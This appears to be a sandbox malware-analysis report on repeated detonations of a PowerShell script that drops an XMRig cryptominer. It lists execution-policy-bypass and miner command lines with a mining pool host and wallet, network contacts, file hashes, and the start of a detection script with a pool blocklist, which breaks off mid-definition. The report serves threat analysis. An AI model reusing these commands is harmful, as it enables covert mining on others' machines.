memory/1520-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| (64 identical rows with no description, indicator, process or target) | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4404 wrote to memory of 3656 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4404 wrote to memory of 3656 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/4404-3-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4404-5-0x000001D2AD920000-0x000001D2AD942000-memory.dmp
memory/4404-6-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-9-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-10-0x000001D2ADC10000-0x000001D2ADC86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l3voujmf.tjs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4404-25-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-48-0x000001D2AD9E0000-0x000001D2AD9F2000-memory.dmp
memory/4404-61-0x000001D2AD9D0000-0x000001D2AD9DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3656-90-0x000001FDC2A30000-0x000001FDC2A50000-memory.dmp
memory/3656-91-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-92-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/4404-93-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4404-94-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4404-95-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/3656-96-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-97-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-98-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-99-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-100-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-101-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-102-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-103-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-104-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-105-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-106-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-107-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-108-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-109-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-110-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-111-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-112-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-113-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-114-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-115-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-116-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-117-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-118-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-119-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-120-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-121-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-122-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-123-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-124-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-125-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-126-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-127-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-128-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-129-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-130-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-131-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-132-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-133-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-134-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-135-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-136-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-137-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-138-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-139-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-140-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-141-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-142-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-143-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-144-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-145-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-146-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-147-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-148-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-149-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-150-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-151-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-152-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-153-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-154-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-155-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-156-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:39
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| (64 identical rows with no description, indicator, process or target) | | | |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_423dm12o.rcc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3616-25-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-48-0x00000270F57F0000-0x00000270F5802000-memory.dmp
memory/3616-61-0x00000270F5430000-0x00000270F543A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:14
Platform
win10v2004-20240611-en
Max time kernel
1800s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1988 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1988 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
memory/1988-0-0x00007FFB65F33000-0x00007FFB65F35000-memory.dmp
memory/1988-1-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1gm5wa5.uiq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:15
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2192 wrote to memory of 4160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2192 wrote to memory of 4160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0atsjvt.3fs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2192-25-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/2192-48-0x0000015D51A10000-0x0000015D51A22000-memory.dmp
memory/2192-61-0x0000015D51870000-0x0000015D5187A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2888 wrote to memory of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2888 wrote to memory of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
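The two command lines above are the whole chain this detonation recorded: powershell.exe started with -ExecutionPolicy bypass on a .ps1 in the user's Temp directory, and the dropped xmrig.exe started with -o <pool:port> and -u <wallet>. The AdjustPrivilegeToken entries add SeDebugPrivilege for PowerShell and SeLockMemoryPrivilege for xmrig.exe; the latter is what XMRig requests to use huge pages. The script below is an added example, not part of the sandbox report: it turns those observations into rules over process-creation and privilege-adjust events. The Event schema, the rule names and the POOL_SUFFIXES blocklist are this example's own assumptions; the sample events are constructed from the report's behavioral21 sections. The Monero address check is structural only (length and base58 alphabet), not a checksum validation.

```python
"""Triage rules for the PowerShell -> xmrig.exe chain in this report.

Added example, not part of the sandbox report. The Event fields (kind, pid,
ppid, image, parent_image, cmdline, privilege) are an assumed schema, not a
real EDR format; the sample events are constructed from behavioral21's
Processes and AdjustPrivilegeToken sections.
"""
import re
import shlex
from dataclasses import dataclass

# Monero standard address: '4' followed by 94 base58 characters (no 0, O, I, l)
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
# Assumed pool blocklist, seeded with the one domain this report shows
POOL_SUFFIXES = ("moneroocean.stream",)
USER_TEMP = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)


@dataclass
class Event:
    kind: str               # "process_create" or "privilege_adjust"
    pid: int
    image: str
    ppid: int = 0
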